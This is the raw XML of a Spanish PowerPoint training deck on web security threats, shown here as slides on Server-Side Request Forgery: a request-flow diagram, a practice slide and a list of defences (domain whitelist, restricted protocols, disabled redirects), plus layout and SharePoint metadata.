            <a:ext cx="2160894" cy="523163"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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12" name="Arrow: Right 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDBC4CB-48CC-307C-70F6-B24A387A9689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2142370" y="4150061"/>
            <a:ext cx="2160894" cy="523163"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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5" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB0B7F3-FF49-06E4-41C3-CEAF25E42D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2027819" y="4839314"/>
            <a:ext cx="216089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rPr>
              <a:t>Envío de respuesta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> atacante</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Arrow: Right 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4231ADB-6D94-5F35-AD0F-458553617E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217425" y="3503091"/>
            <a:ext cx="2160894" cy="523163"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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7" name="Arrow: Right 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E358707-0992-0933-CB24-CD87F917B6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7217424" y="4151359"/>
            <a:ext cx="2160894" cy="523163"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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8" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C8F023-9425-034A-780B-152255BF1BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150810" y="4839314"/>
            <a:ext cx="229412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rPr>
              <a:t>Respuesta desde el otro recurso interno (recurso.com)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FAEED9-2EFD-57FE-90F3-57F213453A69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419459" y="5518775"/>
            <a:ext cx="1747621" cy="369332"/>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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>recurso.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Imagen 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48A23C40-468C-2692-5065-9611641710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70210" y="3464255"/>
            <a:ext cx="1042506" cy="1283084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Flecha curvada hacia abajo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2B4CBF-C5E4-511C-83B8-0023D755FA4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106079" y="1810440"/>
            <a:ext cx="9833486" cy="1164679"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21036"/>
              <a:gd name="adj2" fmla="val 57442"/>
              <a:gd name="adj3" fmla="val 24329"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Multiplicar 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B61AB34-E163-0208-0F4A-F6B529590FEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4760094" y="1180849"/>
            <a:ext cx="1410488" cy="1259180"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009D8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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A99363-3A74-8923-9281-78D03940701B}"/>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08782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0B4DF-1E80-FE03-66D8-06E3182D89D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82046261-7F07-E08B-E5B4-D0D0BB0FCDA0}"/>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41C45A3-AF17-0456-50CD-62A387501D80}"/>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Amenazas: Server – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (SSRF) - Práctica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7355293-A7A7-FA3F-8B0F-05DE7B6105C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13" name="Picture 4" descr="Botón Rojo Play PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF183C9-958C-60C9-3B1D-623C34704D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7612" y="1341762"/>
            <a:ext cx="780288" cy="780288"/>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D0A8FAF7-69E0-C383-890F-D2A22CA58C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571056" y="2154808"/>
            <a:ext cx="10693400" cy="3371445"/>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5CC8AC5D-EB86-26F5-1113-284724157EC3}"/>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191774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93F0F-AC71-FB7A-9B25-A051B64D660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1494AAF-1AA7-4299-D125-3D5A49A590D2}"/>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2875E60-4CE1-62EC-974C-8A3261761AB6}"/>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10. Falsificación de solicitudes del lado del Servidor - Medidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E23B78-6A58-048E-3D38-5BAFDDB040F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Una señal de alto&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8CC05A-0B2F-6054-27F5-125F65F3A7C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5826" t="10811" r="11340" b="17885"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8392" y="1768907"/>
            <a:ext cx="2685601" cy="3889224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E5EA7E-2BAB-A708-8A03-23621DED1D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3602007" y="318566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b="1">
                <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9237402-1AA7-8279-F5AF-9C513B8AB36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5012916" y="2012052"/>
            <a:ext cx="6039251" cy="369332"/>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Usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para los dominios aceptados.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969E9FBE-1869-A455-8BC6-940B11D12795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5012916" y="3507411"/>
            <a:ext cx="6039251" cy="369332"/>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Restringir los protocolos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>habilitados.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CD09B9-BFA7-DF4F-27F3-5160CF1FCA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3602007" y="1621632"/>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 name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE7B9AED-0DD9-CEC9-F493-EAAABD3D9A66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3622555" y="4777512"/>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b="1">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3129CE7F-3E83-C036-CEB6-ECEA8B96D715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023190" y="5140359"/>
            <a:ext cx="6039251" cy="369332"/>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Deshabilitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>redirecciones.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF88B27-1FC8-0E65-C162-6B105FD6D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1706" y="1865618"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900D95F2-E0DF-84D7-3CD2-4986F5F6B4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9987" y="5026365"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96A60F9-B0AE-5C1D-139B-9B4008BD2A3D}"/>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2277228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54BE19CA83FD94B936B01765C29D210" ma:contentTypeVersion="11" ma:contentTypeDescription="Crear nuevo documento." ma:contentTypeScope="" ma:versionID="91de76c1aa61add1d3f64d8b8d05f0d1">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="9ee65a63-5214-4327-801a-2c9dc95f8f85" xmlns:ns3="62215bba-a255-4b95-ab9c-7659199f0231" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="dc88c394a17b31f53bc57c64650ec4b9" ns2:_="" ns3:_="">
    <xsd:import namespace="9ee65a63-5214-4327-801a-2c9dc95f8f85"/>
    <xsd:import namespace="62215bba-a255-4b95-ab9c-7659199f023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e65a63-5214-4327-801a-2c9dc95f8f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Etiquetas de imagen" ma:readOnly="false" ma:fieldId="{5cf76f15-5ced-4ddc-b409-7134ff3c332f}" ma:taxonomyMulti="true" ma:sspId="adeec245-85f4-47be-9991-f792700f932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215bba-a255-4b95-ab9c-7659199f0231"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f803b27-d104-4739-b5d9-d7e5ac4449a8}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="62215bba-a255-4b95-ab9c-7659199f02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62215bba-a255-4b95-ab9c-7659199f0231" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="9ee65a63-5214-4327-801a-2c9dc95f8f8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D8F2AC0-B69B-46C9-AB2C-CF592D1094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e65a63-5214-4327-801a-2c9dc95f8f85"/>
    <ds:schemaRef ds:uri="62215bba-a255-4b95-ab9c-7659199f0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3ED8B3-10BD-42A7-926E-61D38F61CD92}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{86C3D7F8-3C72-4F4E-BFD8-3EFA6A710000}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="9ee65a63-5214-4327-801a-2c9dc95f8f85"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/term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62215bba-a255-4b95-ab9c-7659199f023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2103</TotalTime>
  <Words>10083</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>1235</Paragraphs>
  <Slides>110</Slides>
  <Notes>96</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110</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="125" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial,Sans-Serif</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Fira Sans SemiBold</vt:lpstr>
      <vt:lpstr>Inter</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet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Virginia Urien Real De Asua</dc:creator>
  <cp:lastModifiedBy>Koldo Perez de San Roman Martinez de Lahidalga</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-22T15:42:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-16T19:49:23Z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0x010100254BE19CA83FD94B936B01765C29D210</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>